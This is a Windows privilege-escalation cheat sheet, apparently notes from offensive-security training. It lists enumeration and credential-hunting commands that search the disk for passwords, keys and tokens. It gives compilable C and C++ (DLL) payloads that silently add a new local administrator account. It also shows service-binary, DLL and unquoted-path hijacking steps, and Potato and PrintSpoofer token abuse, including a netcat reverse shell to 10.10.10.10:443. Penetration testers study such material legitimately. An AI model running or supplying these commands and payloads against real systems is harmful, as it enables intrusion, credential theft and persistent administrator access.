Windows

# SID representation (RID = 1001)
S-R-X-Y
S-1-5-21-1336799502-1441772794-948155058-1001
# Well known SIDs
S-1-0-0                       Nobody        
S-1-1-0	                      Everybody
S-1-5-11                      Authenticated Users
S-1-5-18                      Local System
S-1-5-domainidentifier-500    Administrator
# Integrity Levels
- System integrity – Kernel-mode processes with SYSTEM privileges
- High integrity – Processes with administrative privileges
- Medium integrity – Processes running with standard user privileges
- Low integrity level – Restricted processes, often used for security [sandboxing], such as web browsers.
- Untrusted – The lowest integrity level, assigned to highly restricted processes that pose potential security risks

Windows Permissions

Enumerating Windows

# Username and hostname
whoami
hostname

# Existing users and groups
Get-LocalUser ; net user
Get-LocalGroup ; net localgroup
# Display users info
net user <user>
# Display members of a group
Get-LocalGroupMember <group>

# Operating system, version and architecture
systeminfo        # wikipedia.org/wiki/List_of_Microsoft_Windows_versions

# Network information : listening ports, routes, services and processes
ipconfig /all
route print
netstat -ano
powershell -Command "Get-NetTCPConnection -State Listen | Select-Object LocalAddress,LocalPort,OwningProcess | Format-Table -AutoSize"
powershell -Command "Get-Process -Id (Get-NetTCPConnection -State Listen).OwningProcess | Select-Object Id,ProcessName"  

# Installed applications : Config files, Keepass(Password Manager), Public Exploit
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
Get-ItemProperty "HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
dir /a "C:\"
dir "C:\Program Files"
dir "C:\Program Files (x86)"

# Running processes
Get-Process

# Automated Enumeration
winPEASx64.exe [-lolbas]
Seatbelt.exe -group=all -full
powershell.exe -ExecutionPolicy Bypass -File .\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt
import-module PowerUp.ps1 ; Invoke-AllChecks -HTMLReport
. .\PrivescCheck.ps1; Invoke-PrivescCheck -Extended -Report PrivescCheck_$($env:COMPUTERNAME) -Format TXT,HTML

# Using Runas to execute cmd as another user
runas /user:htb_user cmd
Invoke-RunasCs -Username svc_mssql -Password trustno1 -Command "whoami"
.\RunasCs.exe <USERNAME> <PASSWORD> cmd.exe -r <LHOST>:<LPORT> --bypass-uac

Credential Hunting

# Recursive file search by name/extension : Searching for text files and password manager databases
Get-ChildItem -Path C:\ -Include *.kdbx,*.xml,*.config,*.rdp,*.ps1,*.psm1,*.pfx,*.pem,*.credential,*.json,*.txt,*.ini -Recurse -Force -ErrorAction SilentlyContinue | Select-Object FullName
dir /s/b *.txt
tree /F /A
# Recursive search for likely credentials/strings (content search)
findstr /S /I /N /P "password cpassword pwd pass key secret token api_key" C:\*
Get-ChildItem -Path 'C:\' -Recurse -Force -ErrorAction SilentlyContinue -File | Where-Object { $_.Length -lt 1048576 } | Select-String -Pattern 'password','cpassword','pwd','pass','secret' -SimpleMatch | Select-Object Path,LineNumber,Line
# Quick grep-like for sensitive filenames
Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue -Include *pass*,*pwd*,*credential*,*secret*,*key* | Select-Object FullName
# Find recently modified files
powershell -Command "Get-ChildItem -Path C:\ -Recurse -Force -ErrorAction SilentlyContinue | Where-Object { $_.LastWriteTime -gt (Get-Date).AddDays(-7) } | Select-Object FullName,LastWriteTime | Sort-Object LastWriteTime -Descending | Format-Table -AutoSize"

# History
Get-History
(Get-PSReadlineOption).HistorySavePath

Service Binary Hijacking

# List of services with binary path
Get-CimInstance -ClassName win32_service | Select Name,State,PathName | Where-Object {$_.State -like 'Running'}
Get-Service | Format-Table Name,DisplayName,Status,StartType -AutoSize | findstr /I 'Running'
sc query
# Check Permissions of mysqld.exe
# icacls permissions : (F:Full access, M:Modify, RX:Read and execute, R:Read-only, W:Write-only)
icacls "C:\xampp\mysql\bin\mysqld.exe"
# If we have Full/Write Acces we can try to change the executable with another one
# Restart the service
net stop mysql ; net start mysql
# We can try to reboot the machine if the service Startup Type is set to "Automatic"
Get-CimInstance -ClassName win32_service | Select Name, StartMode | Where-Object {$_.Name -like 'mysql'}
# Check if we have SeShutdownPrivilege priv if so
whoami /priv    ==>    shutdown /r /t 0

# Automation
. .\PowerUp.ps1
Get-ModifiableServiceFile
Install-ServiceBinary -Name 'mysql'

C code to add user

#include <stdlib.h>
int main () 
{ int i; i = system ("net user dave2 password123! /add"); i = system ("net localgroup administrators dave2 /add"); return 0; }
// x86_64-w64-mingw32-gcc adduser.c -o adduser.exe

DLL Hijacking

Standard DLL search order

# Enumerate installed applications
Get-ItemProperty "HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\*" | select displayname
# We can search online to see if any of the installed applications are vulnerable to DLL hijacking.
# Or Use Process Monitor to detect DLLs loaded by the application as well as missing ones (need admin priv)
# Tip : in procmon search for "NAME NOT FOUND" in result to find missing DLLs

C++ DLL example to add a user : TextShaping.cpp

#include <stdlib.h>
#include <windows.h>
BOOL APIENTRY DllMain(
HANDLE hModule,// Handle to DLL module
DWORD ul_reason_for_call,// Reason for calling function
LPVOID lpReserved ) // Reserved
{
    switch ( ul_reason_for_call )
    {
        case DLL_PROCESS_ATTACH: // A process is loading the DLL.
        int i;
  	    i = system ("net user dave3 password123! /add");
  	    i = system ("net localgroup administrators dave3 /add");
        break;
        case DLL_THREAD_ATTACH: // A process is creating a new thread.
        break;
        case DLL_THREAD_DETACH: // A thread exits normally.
        break;
        case DLL_PROCESS_DETACH: // A process unloads the DLL.
        break;
    }
    return TRUE;
}
// x86_64-w64-mingw32-gcc TextShaping.cpp --shared -o TextShaping.dll

Unquoted Service Paths

# How Windows will try to locate the service binary C:\Program Files\Current Version\GammaServ.exe
C:\Program.exe
C:\Program Files\Current.exe
C:\Program Files\Current Version\GammaServ.exe

# List of services with binary path
Get-CimInstance -ClassName win32_service | Select Name,State,PathName
# List of services with spaces and missing quotes in the binary path cmd.exe
wmic service get name,pathname |  findstr /i /v "C:\Windows\\" | findstr /i /v """            "delete-this
# Reviewing permissions on the Enterprise Apps directory
icacls "C:\Program Files"
# Start/Stop service
Start-Service GammaService ; Stop-Service GammaService

# Automation
. .\PowerUp.ps1
Get-UnquotedService
Write-ServiceBinary -Name 'GammaService' -Path "C:\Program Files\Current.exe"

Scheduled Tasks

1. As which user account (principal) does this task get executed?
2. What triggers are specified for the task?
3. What actions are executed when one or more of these triggers are met?

# List of all scheduled tasks
schtasks /query /fo LIST /v | Select-String "^(HostName|TaskName|Next Run Time|Status|Author|Task To Run|Scheduled Task State):" | ForEach-Object { $_.Line }
Get-ScheduledTask
Get-ScheduledTask | Format-Table TaskName,TaskPath,State,Actions -AutoSize
Get-ScheduledTask -TaskName * | Get-ScheduledTaskInfo | Format-List *
schtasks /query /fo LIST /v /TN "Task Name"     # Filter a specific task
# if we have permission on the executable we can change it like we do in the Service Binary Hijacking
wmic process get Name,ProcessId,CreationDate    # Display running processes

Kernel exploits

# Enumerating the Windows version and security patches
systeminfo
Get-CimInstance -Class win32_quickfixengineering | Where-Object { $_.Description -eq "Security Update" }

Abusing Windows privileges

# Checking our current privileges
whoami /all        # Priv2Admin: List of priv ; EnableAllTokenPrivs.ps1: Enable tokens
whoami /priv
# Check .NET Version : 
reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP"
# If we have : SeImpersonatePrivilege, SeBackupPrivilege, SeAssignPrimaryToken, SeLoadDriver, SeDebug, ...
GodPotato
.\SigmaPotato "net user pwned P@ssword123 /add"
.\SigmaPotato "net localgroup Administrators pwned /add"
.\PrintSpoofer64.exe -c "C:\windows\temp\tools\nc64.exe 10.10.10.10 443 -e cmd"
.\PrintSpoofer64.exe -i -c cmd
.\Juicy.Potato.x86.exe -t * -p shell.exe -l 1338 -c {69AD4AEE-51BE-439b-A92C-86AE490E8B30}  # for old windows version
# Other Potatoes Priv Esc: https://jlajara.gitlab.io/Potatoes_Windows_Privesc

Resources

# Windows
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://book.hacktricks.wiki/en/windows-hardening/windows-local-privilege-escalation/index.html
# LOLBAS WADComs 
https://lolbas-project.github.io
https://wadcoms.github.io